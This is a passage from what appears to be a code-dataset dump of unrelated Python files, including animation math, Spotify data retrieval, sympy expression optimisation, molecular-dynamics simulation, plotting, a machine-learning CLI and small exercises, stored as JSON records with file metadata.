repeater_quat_anims_frames\n\n original_pos = gpos[0, :] * repeater_pos_anims_frames\n original_quat = gquat[0, :] * repeater_quat_anims_frames\n inverse_original_root = pq.inv(None, original_pos, original_quat)\n\n relative_root = pq.mult(anim, inverse_original_root)\n return pq.mult(relative_root, (rootpos, rootquat))\n\n\ndef extract_incremental_anim(anim):\n npos, nquat = np.zeros_like(anim[0]), np.zeros_like(anim[1])\n gpos, gquat = anim\n\n repeater_pos = np.ones_like(gpos[0, ..., 0, np.newaxis].repeat(3, axis=-1))\n repeater_quat = np.ones_like(gquat[0, ..., 0, np.newaxis].repeat(4, axis=-1))\n\n npos[0, ...] = np.zeros(3) * repeater_pos\n nquat[0, ...] = np.array([1, 0, 0, 0]) * repeater_quat\n\n npos[1:, ...], nquat[1:, ...] = pq.mult(\n (gpos[1:, ...], gquat[1:, ...]),\n pq.inv((gpos[:-1, ...], gquat[:-1, ...]))\n )\n\n return npos, nquat\n\n\ndef convert_incremental_anim(anim, start_pose):\n npos, nquat = np.zeros_like(anim[0]), np.zeros_like(anim[1])\n gpos, gquat = anim\n\n lastpos, lastquat = start_pose\n\n for f in range(len(gpos)):\n npos[f, ...], nquat[f, ...] = pq.mult(\n (gpos[f, ...], gquat[f, ...]),\n (lastpos, lastquat)\n )\n lastpos, lastquat = npos[f, ...], nquat[f, ...]\n return npos, nquat\n\n\ndef smooth_trajectory(anim, steps=5):\n start_pose = anim[0][0, ...], anim[1][0, ...]\n ipos, iquat = extract_incremental_anim(anim)\n\n for i in range(steps):\n ipos[1:, ...], iquat[1:, ...] = pq.lerp(\n (ipos[1:, ...], iquat[1:, ...]),\n (ipos[:-1, ...], iquat[:-1, ...]),\n 0.5\n )\n return convert_incremental_anim((ipos, iquat), start_pose)","sub_path":"animation/npk/animation_framework/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":7838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"198645478","text":"from util import SpotifyUtil\r\nimport config\r\nimport os\r\n\r\nITEM_LIMIT=50\r\nDATA_PATH='data'\r\nDATA_DICT = {\r\n 'songplays': {'current_user_recently_played': 'user-read-recently-played'},\r\n 'top_artists': {'current_user_top_artists': 'user-top-read'},\r\n 'top_tracks': {'current_user_top_tracks': 'user-top-read'}\r\n}\r\n\r\ndef main():\r\n\r\n # Instantiate a SpotifyUtil object \r\n spotifyutil = SpotifyUtil(username=config.USERNAME,\r\n client_id=config.CLIENT_ID,\r\n client_secret=config.CLIENT_SECRET,\r\n redirect_uri=config.REDIRECT_URI)\r\n \r\n # Retrieve data from Spotify\r\n for data, scope_dict in DATA_DICT.items():\r\n print(f'--GETTING {data}--')\r\n for query, scope in scope_dict.items():\r\n df = spotifyutil.get_spotify_data(scope=scope, query=query, limit=ITEM_LIMIT)\r\n\r\n # Write data to spotify_analytics/data\r\n df.to_csv(os.path.join(DATA_PATH, f'{data}.csv'), index=False, encoding='utf-8')\r\n \r\nif __name__ == '__main__':\r\n main()","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"510076020","text":"\"\"\" Optimizations of the expression tree representation for better CSE\nopportunities.\n\"\"\"\nfrom sympy.core import Add, Basic, Expr, Mul\nfrom sympy.core.basic import preorder_traversal\nfrom sympy.core.exprtools import factor_terms\nfrom sympy.utilities.iterables import default_sort_key\n\n\nclass Neg(Expr):\n \"\"\" Stub to hold negated expression.\n \"\"\"\n __slots__ = []\n\n\ndef sub_pre(e):\n \"\"\" Replace y - x with Neg(x - y) if -1 can be extracted from y - x.\n \"\"\"\n reps = [a for a in e.atoms(Add) if a.could_extract_minus_sign()]\n\n # make it canonical\n reps.sort(key=default_sort_key)\n\n e = e.subs([(a, Mul(-1, -a, evaluate=False)) for a in reps])\n # now replace any persisting Adds, a, that can have -1 extracted with Neg(-a)\n if isinstance(e, Basic):\n negs = {}\n for a in sorted(e.atoms(Add), key=default_sort_key):\n if a in reps or a.could_extract_minus_sign():\n negs[a] = Neg(-a)\n e = e.xreplace(negs)\n return e\n\n\ndef sub_post(e):\n \"\"\" Replace Neg(x) with -x.\n \"\"\"\n replacements = []\n for node in preorder_traversal(e):\n if isinstance(node, Neg):\n replacements.append((node, -node.args[0]))\n for node, replacement in replacements:\n e = e.xreplace({node: replacement})\n\n return e\n\ndefault_optimizations = [\n (sub_pre, sub_post),\n (factor_terms, None),\n]\n","sub_path":"sympy/simplify/cse_opts.py","file_name":"cse_opts.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"622833437","text":"from django.db import models\nfrom datetime import datetime\nfrom django.utils import timezone\n# Create your models here.\n\nclass Contact(models.Model):\n name = models.CharField(max_length=30)\n email = models.EmailField(max_length=30)\n subject = models.CharField(max_length=50)\n message = models.TextField(max_length=500)\n createdate = models.DateField(\"Date\", default=timezone.now)\n\n def __str__(self):\n return self.email\n","sub_path":"qijiexue/Resume/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"376512987","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport matplotlib as mpl \nimport matplotlib.pyplot as plt\n\ndef f7(seq):\n seen = set()\n seen_add = seen.add\n return [ x for x in seq if not (x in seen or seen_add(x))]\n\nmpl.rc('text', usetex=True)\nmpl.rc('font', family='serif')\nmpl.rcParams['text.latex.unicode']=True\n\ndef main():\n data = [line.strip() for line in open('unweighted', 'r')]\n x = []\n y = []\n\n start = data[1].split('/')\n goal = data[-2].split('/')\n\n start = [int(i) for i in start]\n goal = [int(i) for i in goal]\n\n data = f7(data)\n\n for d in data[:-2]:\n if ('E' == d[0]):\n continue\n numbers = d.split('/')\n x.append(numbers[0])\n y.append(numbers[1])\n\n fig = plt.figure()\n ax = fig.gca()\n ax.set_xlim([0, 350])\n ax.set_ylim([0, 350])\n# ax.xlim()\n\n for tick in ax.xaxis.get_major_ticks():\n tick.label.set_fontsize(20) \n\n for tick in ax.yaxis.get_major_ticks():\n tick.label.set_fontsize(20) \n\n ax.annotate('Start: ' + str(start[0]) + '/' + str(start[1]), xy=(start[0], start[1]), xytext=(start[0] + 30, start[1]), fontsize=20)\n ax.annotate('Goal: ' + str(goal[0]) + '/' + str(goal[1]), xy=(goal[0], goal[1]), xytext=(goal[0] + 15, goal[1]), fontsize=20)\n\n plt.scatter(x,y, color='#848482', marker='.')\n plt.plot(start[0], start[1], color='#000000', marker='o')\n plt.plot(goal[0], goal[1], color='#000000', marker='o')\n\n plt.xlabel(r'', fontsize=20)\n plt.ylabel(r'', fontsize=20)\n\n# plt.grid(True)\n# plt.show()\n fig.savefig('fig2.png', bbox_inches='tight')\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"doc/documentation/data/expansions/expansion_plot.py","file_name":"expansion_plot.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"379574746","text":"import time\n\nfrom neutron_lib import worker\n\nfrom oslo_log import log as logging\nfrom oslo_service import loopingcall\n\n\nLOG = logging.getLogger(__name__)\n\n\nclass OmnipathWorker(worker.BaseWorker):\n def __init__(self, sync_func, sync_time=None):\n self._sync_func = sync_func\n self._sync_time = 60\n if sync_time:\n self._sync_time = sync_time\n self._loop = None\n super(OmnipathWorker, self).__init__()\n\n def start(self):\n super(OmnipathWorker, self).start()\n if self._loop is None:\n self._loop = loopingcall.FixedIntervalLoopingCall(self._sync_func)\n LOG.INFO(\"Starting omnipath worker\")\n self._loop.start(interval=self._sync_time)\n\n def stop(self):\n if self._loop is not None:\n LOG.INFO(\"Stopping omnipath worker\")\n self._loop.stop()\n\n def wait(self):\n if self._loop is not None:\n LOG.INFO(\"Waiting omnipath worker\")\n self._loop.wait()\n self._loop = None\n\n def reset(self):\n LOG.INFO(\"Reseting omnipath worker\")\n self.stop()\n self.wait()\n self.start()\n","sub_path":"neutron/plugins/ml2/drivers/omnipath/mechanism_driver/common/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"195291616","text":"#*********************************************************************************\r\n#* Copyright (C) 2016-2021 Alexey V. Akimov\r\n#*\r\n#* This file is distributed under the terms of the GNU General Public License\r\n#* as published by the Free Software Foundation, either version 3 of\r\n#* the License, or (at your option) any later version.\r\n#* See the file LICENSE in the root directory of this distribution\r\n#* or .\r\n#*\r\n#*********************************************************************************/\r\n###################################################################\n# This is a classical all-atomic MD \n###################################################################\n\nimport sys\r\nimport cmath\r\nimport math\r\nimport os\r\n\r\nif sys.platform==\"cygwin\":\r\n from cyglibra_core import *\r\nelif sys.platform==\"linux\" or sys.platform==\"linux2\":\r\n from liblibra_core import *\r\n\r\nfrom libra_py import *\r\n\n \n\ndef main():\n\n rnd = Random()\n\n #--------------------- Initialization ----------------------\n\n # Create Universe and populate it\n U = Universe(); LoadPT.Load_PT(U, os.getcwd()+\"/elements.txt\")\n\n # Create force field\n uff = ForceField({\"bond_functional\":\"Harmonic\", \"angle_functional\":\"Fourier\",\n \"dihedral_functional\":\"General0\", \"oop_functional\":\"Fourier\",\n \"mb_functional\":\"LJ_Coulomb\",\"R_vdw_on\":40.0,\"R_vdw_off\":55.0 })\n LoadUFF.Load_UFF(uff,\"uff.dat\")\r\n\r\n\r\n # Create molecular system and initialize the properties\n syst = System()\n\n LoadMolecule.Load_Molecule(U, syst, \"Pc-C60.ent\", \"pdb\")\n\n syst.determine_functional_groups(0) # do not assign rings\n syst.init_fragments()\n print(\"Number of atoms in the system = \", syst.Number_of_atoms)\n print(\"Number of bonds in the system = \", syst.Number_of_bonds)\n print(\"Number of angles in the system = \", syst.Number_of_angles)\n print(\"Number of dihedrals in the system = \", syst.Number_of_dihedrals)\n print(\"Number of impropers in the system = \", syst.Number_of_impropers)\n atlst1 = list(range(1,syst.Number_of_atoms+1))\n\n # Creating Hamiltonian and initialize it\n ham = Hamiltonian_Atomistic(1, 3*syst.Number_of_atoms)\r\n ham.set_Hamiltonian_type(\"MM\")\n ham.set_interactions_for_atoms(syst, atlst1, atlst1, uff, 1, 0) # 0 - verb, 0 - assign_rings\n ham.show_interactions_statistics()\n\n\n # Bind Hamiltonian and the system \n ham.set_system(syst); ham.compute(); print(\"Energy = \", ham.H(0,0), \" a.u.\")\n\r\n # Electronic DOFs\r\n el = Electronic(1,0)\r\n\r\n\r\n # Nuclear DOFs\r\n mol = Nuclear(3*syst.Number_of_atoms)\r\n\r\n # Initialize MD variables\r\n nve_md.nve_md_init(syst, mol, el, ham)\r\n\r\n\r\n\r\n #=================== Propagation ====================\r\n \r\n ########################## Cooling #################################\r\n\r\n md = MD({\"max_step\":100,\"ensemble\":\"NVT\",\"integrator\":\"DLML\",\"terec_exp_size\":10,\"dt\":20.0,\"n_medium\":1,\"n_fast\":1,\"n_outer\":1})\n md.show_info()\n \r\n # Thermostat\n therm = Thermostat({\"Temperature\":278.0,\"Q\":100.0,\"thermostat_type\":\"Nose-Hoover\",\"nu_therm\":0.001,\"NHC_size\":5})\n therm.show_info()\n\n\n ST = State() \n ST.set_system(syst)\n ST.set_thermostat(therm)\n ST.set_md(md)\n\n ST.init_md(mol, el, ham, rnd) \n\n\n\n f = open(\"_en_cooling.txt\",\"w\")\r\n f.close()\r\n\r\n\r\n for i in range(100):\r\n syst.set_atomic_q(mol.q)\r\n syst.print_xyz(\"_mol_cooling.xyz\",i)\r\n\r\n ST.run_md(mol, el, ham)\r\n ekin = ST.E_kin; epot = ST.E_pot\r\n ST.cool()\r\n\r\n f = open(\"_en_cooling.txt\",\"a\")\r\n f.write(\"i= %3i ekin= %8.5f epot= %8.5f etot= %8.5f H_NP= %8.5f curr_T= %8.5f\\n\" % (i, ekin, epot, ST.E_tot, ST.H_NP, ST.curr_T ))\r\n f.close()\r\n\r\n\r\n ########################## Production MD #################################\r\n\r\n syst.init_atom_velocities(300.0, rnd) # must be this !!!\r\n# syst.init_fragment_velocities(300.0, rnd)\r\n\r\n f = open(\"_en_md.txt\",\"w\")\r\n f.close()\r\n md.dt = 40.0 \r\n md.max_step = 10\r\n\r\n for i in range(1000):\r\n syst.set_atomic_q(mol.q)\r\n syst.print_xyz(\"_mol_md.xyz\",i)\r\n\r\n ST.run_md(mol, el, ham)\r\n\r\n f = open(\"_en_md.txt\",\"a\")\r\n f.write(\"i= %3i ekin= %8.5f epot= %8.5f etot= %8.5f H_NP= %8.5f curr_T= %8.5f\\n\" % (i, ST.E_kin, ST.E_pot, ST.E_tot, ST.H_NP, ST.curr_T ))\r\n f.close()\r\n\r\n\r\nmain()\r\n\r\n","sub_path":"13_force_fields_and_classical_md/4_mm_md/2_atomistic_md/1_SubPc-C60/case3/run_aa_md_state.py","file_name":"run_aa_md_state.py","file_ext":"py","file_size_in_byte":4426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"648462409","text":"import time\nfrom src import utilities\nfrom src.aconf import (STYLESHEET, \n WEBSITE, \n PDB2PQR_OPAL_URL,\n HAVE_PDB2PQR_OPAL,\n INSTALLDIR,\n TMPDIR,\n MAXATOMS, \n PDB2PQR_VERSION)\n\ndef setID(time):\n \"\"\"\n Given a floating point time.time(), generate an ID.\n Use the tenths of a second to differentiate.\n\n Parameters\n time: The current time.time() (float)\n Returns\n id : The file id (string)\n \"\"\"\n strID = \"%s\" % time\n # period = string.find(strID, \".\")\n period = strID.find(\".\")\n id = \"%s%s\" % (strID[:period], strID[(period+1):(period+2)])\n return id\n\n\ndef redirector(name, weboptions):\n \"\"\"\n Prints a page which redirects the user to querystatus.cgi and writes starting time to file\n \"\"\"\n \n redirectWait = 3\n\n utilities.startLogFile(name, 'pdb2pqr_start_time', str(time.time()))\n \n jobid = int(name)\n \n analiticsDict = weboptions.getOptions()\n \n events = {}\n \n events['submission'] = analiticsDict['pdb']+'|'+str(\"localhost:5000\")\n # events['submission'] = analiticsDict['pdb']+'|'+str(os.environ[\"REMOTE_ADDR\"])\n del analiticsDict['pdb']\n \n events['titration'] = str(analiticsDict.get('ph'))\n if 'ph' in analiticsDict:\n del analiticsDict['ph']\n \n events['apbsInput'] = str(analiticsDict.get('apbs'))\n del analiticsDict['apbs']\n \n #Clean up selected extensions output\n if 'selectedExtensions' in analiticsDict:\n analiticsDict['selectedExtensions'] = ' '.join(analiticsDict['selectedExtensions'])\n \n options = ','.join(str(k)+':'+str(v) for k,v in analiticsDict.iteritems())\n events['options']=options\n\n eventsScriptString = ''\n for event in events:\n eventsScriptString += utilities.getEventTrackingString(category='submissionData',\n action=event, \n label=events[event]) \n \n redirectURL = \"{website}jobstatus?jobid={jobid}\".format(website=WEBSITE, \n jobid=jobid)\n\n# string = \"\"\"\n# \n# \n# {trackingscript}\n# \n# \n# \n# \n# \n#
    \n# You are being automatically redirected to a new location.
    \n# If your browser does not redirect you in {wait} seconds, or you do\n# not wish to wait, click here
    . \n# \n# \"\"\".format(trackingscript=utilities.getTrackingScriptString(jobid=jobid), \n# trackingevents=eventsScriptString, redirectURL=redirectURL, wait=redirectWait, website=WEBSITE)\n # return string\n return redirectURL\n","sub_path":"src/workflow/legacy/pdb2pqoldutil.py","file_name":"pdb2pqoldutil.py","file_ext":"py","file_size_in_byte":3164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"448259619","text":"import os\nimport glob\nimport pickle\nimport re\n\n# Our numerical workhorses\nimport numpy as np\nimport pandas as pd\n\n# Import the project utils\nimport sys\nsys.path.insert(0, '../analysis/')\nimport mwc_induction_utils as mwc\n\n# Import matplotlib stuff for plotting\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\n\n# Seaborn, useful for graphics\nimport seaborn as sns\n\nmwc.set_plotting_style()\n\n#===============================================================================\n# Read the data\n#===============================================================================\n\ndatadir = '../../data/'\ndf = pd.read_csv(datadir + 'flow_master.csv', comment='#')\n\n# Now we remove the autofluorescence and delta values\ndf = df[(df.rbs != 'auto') & (df.rbs != 'delta') & (df.IPTG_uM == 0)]\n\n# Let's import the data from HG 2011 and RB 2014\ndf_old = pd.read_csv(datadir + 'tidy_lacI_titration_data.csv', comment='#')\ndf_old = df_old[df_old.operator != 'Oid']\n#===============================================================================\n# O2 RBS1027\n#===============================================================================\n# Load the flat-chain\nwith open('../../data/mcmc/main_text_KaKi.pkl', 'rb') as file:\n unpickler = pickle.Unpickler(file)\n gauss_flatchain = unpickler.load()\n gauss_flatlnprobability = unpickler.load()\n\n# map value of the parameters\nmax_idx = np.argmax(gauss_flatlnprobability, axis=0)\nea, ei, sigma = gauss_flatchain[max_idx]\n\n#===============================================================================\n# Plot the theory vs data for all 3 operators\n#===============================================================================\n\n## Flow Data ##\n# Define the number of repressors for the theoretical predictions\nr_array = np.logspace(0, 3.5, 100)\n# Set the colors for the strains\ncolors = sns.color_palette('colorblind', n_colors=4)\n\n# Define the operators and their respective energies\noperators = ['O1', 'O2', 'O3']\nenergies = {'O1': -15.3, 'O2': -13.9, 'O3': -9.7, 'Oid': -17}\n\n# Initialize the plot to set the size\n#fig = plt.figure(figsize=(4.5, 4.5))\nsns.set_context('paper')\nfig = plt.figure()\nax = plt.subplot(111, aspect='equal')\nplt.axis('scaled')\n\n## HG and RB data ##\ndf_group = df_old.groupby('operator')\ni = 0\nfor group, data in df_group:\n # Extract HG data\n garcia = data[data.author == 'garcia']\n ax.plot(garcia.repressor, garcia.fold_change, color=colors[i],\n lw=0, marker='o', label='', alpha=0.75)\n # Extract RB data\n brewster = data[data.author == 'brewster']\n ax.plot(brewster.repressor, brewster.fold_change, color=colors[i],\n lw=0, marker='D', label='', alpha=0.75)\n i += 1\n\n# Group data by operator\ndf_group = df.groupby('operator')\n\n# initialize counter (because of df_group)\ni = 0\n\nfor group, data in df_group:\n # Compute the theoretical fold change for this operator\n fc = mwc.fold_change_log(np.array([0]), ea, ei, 4.5,\n r_array / 2, data.binding_energy.unique())\n ax.plot(r_array, fc, color=colors[i],\n label=group + r' $\\Delta\\varepsilon_{RA} =$' +\n str(data.binding_energy.unique()[0]) + ' $k_BT$')\n # compute the mean value for each concentration\n fc_mean = data.groupby('repressors').fold_change_A.mean()\n # compute the standard error of the mean\n fc_err = data.groupby('repressors').fold_change_A.std() / \\\n np.sqrt(data.groupby('repressors').size())\n log_fc_err = fc_mean - 10**(np.log10(fc_mean) -\n fc_err / fc_mean / np.log(10))\n\n log_fc_err = np.vstack([log_fc_err, 10**(np.log10(fc_mean) +\n fc_err / fc_mean / np.log(10)) -\n fc_mean])\n # plot the experimental data\n ax.errorbar(fc_mean.index * 2, fc_mean,\n yerr=log_fc_err,\n fmt='o', markeredgecolor=colors[i], label='',\n markerfacecolor='white', markeredgewidth=2)\n i += 1\n\nax.plot([], [], marker='o',\n markeredgecolor='k', markerfacecolor='w', markeredgewidth=2,\n label='flow cytometry', lw=0)\nax.plot([], [], marker='o', color='k', alpha=0.75,\n label='HG & RP 2011,\\nMiller assay', lw=0)\nax.plot([], [], marker='D', color='k', alpha=0.75,\n label='RB et al. 2014,\\ntime lapse microscopy', lw=0)\nax.set_xscale('log')\nax.set_yscale('log')\nax.set_xlabel('repressors / cell')\nax.set_ylabel('fold-change')\nax.set_xlim(right=10**3.5)\nax.set_ylim(top=2)\nleg = ax.legend(loc='lower left', fontsize=8)\nleg.set_zorder(1)\n\nmwc.scale_plot(fig, 'single_plot_tall')\nplt.tight_layout()\nplt.savefig('../../figures/SI_figs/figS10.pdf', bbox_inches='tight')\n","sub_path":"code/figures/figS10.py","file_name":"figS10.py","file_ext":"py","file_size_in_byte":4688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"358418109","text":"\"\"\"\nA test for nested class\nSTOF: https://stackoverflow.com/a/719718/8435726\n\"\"\"\n\nclass Dog(object):\n\n class Cat(object):\n def __init__(self, age):\n self.age = age\n\n def meow(self):\n return \"I want fish!\"\n\n def __init__(self, age):\n self.age = age\n\n def say(self, content):\n if content == \"Wooh\":\n return \"WOOH!! WOOH!! WOOH!!\"\n\n elif content == \"Meow\":\n return Dog(1).Cat(0).meow()\n\n else:\n return \"Fuck off!\"\n\n\ndog = Dog(1)\ncat = Dog(1).Cat(99)\n\nprint(dog.age) # >>> 0\nprint(cat.age) # >>> 99\n\nprint(dog.say(\"Wooh\")) # >>> WOOH!! WOOH!! WOOH!!\nprint(dog.say(\"Meow\")) # >>> I want fish!\nprint(cat.meow()) # >>> I want fish!\n","sub_path":"SimpleLearnings/py_nested_class.py","file_name":"py_nested_class.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"613157561","text":"'''\n28분 걸림\n오랜만에 해서 좀 verbose한 답이긴 함\n'''\n\ndef solution(board, moves):\n # 행렬의 높이를 저장한다\n height = len(board)\n\n # 가로 인덱스 값 기반으로 행렬에서 맨 위의 값을 뽑아온다\n def pop_vertically(row_idx: int):\n for i in range(0, height):\n val = board[i][row_idx]\n\n # 0이 아닌 값을 찾으면\n if val != 0:\n # 그 자리를 0으로 채우고\n board[i][row_idx] = 0\n # 그 값을 가져온다\n return val\n\n # 결과 바구니\n result = []\n # 터진 인형 갯수 (+2씩 됨)\n answer = 0\n\n # 바구니에 채운다\n def push_result(val: int):\n answer = 0\n\n # debug\n # print('start', result, val)\n \n # 빈 바구니가 아니면\n if len(result) != 0:\n # 바구니 맨 위랑 겹치나 확인\n if val == result[-1]:\n\n # 겹치면 넣지않고, 이미 있는걸 뺀다\n result.pop()\n\n\n # 터진 인형 갯수 +2\n answer = 2\n # 안 겹치면\n else:\n # 바로 넣는다\n result.append(val)\n # 빈 바구니면\n else:\n # 바로 넣는다\n result.append(val)\n \n # debug\n # print('end', result, val)\n\n return answer\n \n\n # moves 따라 실행함\n for move in moves:\n # debug\n # print('move:', move)\n\n val = pop_vertically(move - 1) # 인덱스 1부터 시작하니까\n if val != None:\n answer += push_result(val)\n\n return answer","sub_path":"Programmers/2019카카오겨울인턴십/크레인인형뽑기.py","file_name":"크레인인형뽑기.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"299103806","text":"import time\nimport json\nimport os\n\n\n\ndb = {}\n\n\ndef initialize(exchange):\n if exchange == \"COIN-BS\":\n with open(os.path.join(os.path.dirname(__file__),\"CB_db.json\"),'r') as data_file:\n global db\n db = json.load(data_file)\n elif exchange == \"KRK\":\n with open(os.path.join(os.path.dirname(__file__),\"KN_db.json\"),'r') as data_file:\n global db\n db = json.load(data_file)\n elif exchange == 'ITBT':\n with open(os.path.join(os.path.dirname(__file__),\"ITBT_db.json\"),'r') as data_file:\n global db\n db = json.load(data_file)\n\n\n\n\ndef newDateLog(log_type):\n global db\n monthdayyear = time.strftime(\"%m/%d/%Y\")\n db[log_type][monthdayyear] = {}\n\n\ndef getBLKLogs():\n logs = db['BLK_CHN']['logs']\n return logs\n\ndef getCOINBSLogs():\n logs = db['COIN_BS']['logs']\n return logs\n\ndef getOKCLogs():\n logs = db['OKC']['logs']\n return logs\n\ndef getBLKSnapshots():\n snaps = db['BLK_CHN']['snapshots']\n return snaps\n\ndef getCOINBSSnapshots():\n snaps = db['COIN_BS']['snapshots']\n return snaps\n\ndef getOKCSnapshots():\n snaps = db['OKC']['snapshots']\n return snaps\n\n\ndef writeOut(exchange):\n global db\n if exchange == \"COIN-BS\":\n with open(os.path.join(os.path.dirname(__file__),\"CB_db.json\"),'w') as data_file:\n data_file.write(json.dumps(db, indent=4, sort_keys=True))\n print('written')\n elif exchange == \"KRK\":\n with open(os.path.join(os.path.dirname(__file__),\"KN_db.json\"),'w') as data_file:\n data_file.write(json.dumps(db, indent=4, sort_keys=True))\n print('written')\n elif exchange == \"ITBT\":\n with open(os.path.join(os.path.dirname(__file__),\"ITBT_db.json\"),'w') as data_file:\n data_file.write(json.dumps(db, indent=4, sort_keys=True))\n print('written')\n\n\n\n # with open(os.path.join(os.path.dirname(__file__),\"db.json\"),'w') as jsonFile:\n # #print(json.dumps(db, indent=4, sort_keys=True))\n # jsonFile.write(json.dumps(db, indent=4, sort_keys=True))\n # print('written')\n\n","sub_path":"bitmon/DB/db_controller.py","file_name":"db_controller.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"426997697","text":"import logging\nfrom click import group, command, option, argument, echo, File, Path\nfrom ffm import FFMEstimator, read_libffm\n\n\n@group(context_settings={\n 'help_option_names': ['-h', '--help'],\n 'max_content_width': 120,\n})\n@option('-q', '--quiet', 'log_level', flag_value=logging.WARN)\n@option('-v', '--verbose', 'log_level', flag_value=logging.DEBUG, default=True)\ndef cli(log_level):\n logging.basicConfig(level=log_level, format='%(message)s')\n\n\n@cli.command()\n@argument('training_file', type=Path(exists=True, dir_okay=False))\n@argument('model_file', required=False, type=Path(writable=True, dir_okay=False))\n@option('-l', '--lambda', type=float, default=0.00002,\n help='Regularization parameter')\n@option('-k', '--factors', type=int, default=4,\n help='Number of latent factors')\n@option('-r', '--eta', type=float, default=0.2,\n help='Learning rate')\n@option('-t', '--iterations', type=int, default=15,\n help='Number of iterations')\n@option('-p', '--validation-file', type=Path(exists=True, dir_okay=False),\n help='Path to validation set')\n@option('-a', '--auto-stop', type=int, default=0, metavar='N',\n help='Keep iterating at most times without achieving a better validation score')\n@option('--scorer', default='neg_log_loss',\n help='Metric to use for evaluating performance on validation set. '\n 'It can be any predefined sklearn scoring metric '\n '(http://scikit-learn.org/stable/modules/model_evaluation.html)')\n@option('-s', '--threads', type=int, default=1,\n help='Number of threads')\n@option('--norm/--no-norm', default=True,\n help='enable/disable instance-wise normalization')\n@option('--rand/--no-rand', default=True,\n help='enable/disable randomization')\n@option('--bin/--no-bin', default=True,\n help='enable/disable binary file generation from training/validation files')\ndef train(training_file, validation_file, **kwargs):\n \"\"\"Train a FFM model\"\"\"\n model = FFMEstimator(\n lam=kwargs['lambda'],\n k=kwargs['factors'],\n eta=kwargs['eta'],\n nr_iters=kwargs['iterations'],\n auto_stop=kwargs['auto_stop'],\n scorer=kwargs['scorer'],\n nr_threads=kwargs['threads'],\n normalization=kwargs['norm'],\n randomization=kwargs['rand'],\n )\n if kwargs['bin']:\n model.fit_from_file(training_file, validation_file)\n else:\n train_X, train_y = read_libffm(training_file)\n val_X_y = read_libffm(validation_file) if validation_file else None\n model.fit(train_X, train_y, val_X_y)\n model.save_model(kwargs['model_file'] or training_file + '.model')\n\n\n@cli.command()\n@argument('test_file', type=Path(exists=True, dir_okay=False))\n@argument('model_file', type=Path(exists=True, dir_okay=False))\n@argument('output_file', type=File('w'), required=False)\ndef predict(test_file, model_file, output_file):\n \"\"\"Use a trained FFM model to make predictions\"\"\"\n model = FFMEstimator().read_model(model_file)\n test_X, test_y = read_libffm(test_file)\n test_score = abs(model.scorer(model, test_X, test_y))\n echo(\"{} = {:.5g}\".format(model.score, test_score))\n if output_file:\n for p in model.predict_proba(test_X):\n output_file.write('{:.6g}\\n'.format(p))\n\n\nif __name__ == '__main__':\n cli()\n","sub_path":"ffm/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":3333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"419739221","text":"import cv2\nimport math\n###\n\n###\ndef dimensions_match(contour, vertices, range, desired_ratio):\n peri = cv2.arcLength(contour, True)\n approx = cv2.approxPolyDP(contour, 0.04 * peri, True)\n # print(len(approx))\n # if\n if vertices - range <= len(approx) <= vertices + range:\n # compute the bounding box of the contour and use the\n # bounding box to compute the aspect ratio\n (x, y, w, h) = cv2.boundingRect(approx)\n # print(w)\n # print(h)\n if (desired_ratio < 1 and w > h) or (desired_ratio > 1 and h > w):\n temp = w\n w = h\n h = temp\n MIN_RATIO = desired_ratio * 0.60\n MAX_RATIO = desired_ratio * 1.4\n #MIN_RATIO = desired_ratio * 0.6\n #MAX_RATIO = desired_ratio * 1.4\n\n ar = w / float(h)\n # print(ar)\n #\n if MIN_RATIO <= ar <= MAX_RATIO:\n return True\n\n return False\n\n\ndef find_vertices(contour):\n peri = cv2.arcLength(contour, True)\n approx = cv2.approxPolyDP(contour, 0.04 * peri, True)\n return len(approx)\n\n\ndef get_angle(camera, x, y):\n\n a = float(abs(camera.FRAME_WIDTH / 2 - x))\n b = float(camera.FRAME_HEIGHT - y)\n\n if b == 0:\n return 0\n\n radians = math.atan(a / b)\n angle = radians * 180 / math.pi\n return angle\n\n\ndef get_distance(width_pixel, width_actual, focal_length):\n return focal_length * width_actual / width_pixel\n\ndef distance_in_inches(width_pixel):\n return 762 * (width_pixel ** -0.8)\n\ndef distance_in_inches_long(width_pixel):\n return 34618 * (width_pixel ** -1.06)\n","sub_path":"processing/shape_util.py","file_name":"shape_util.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"250066501","text":"# write a function that checks if a variable passed is a palindrome or not \n# what a palindrome is/not \n# input\n# output\n# l = [1, 2, 3]\n# s = \"test string\"\n# l[::]\nimport re\ndef is_palindrome(string):\n if type(string) != str:\n return False\n string = string.upper()\n string1 = re.sub(\"\\W+\",\"\", string)\n string2 = string1[::-1]\n if string1 == 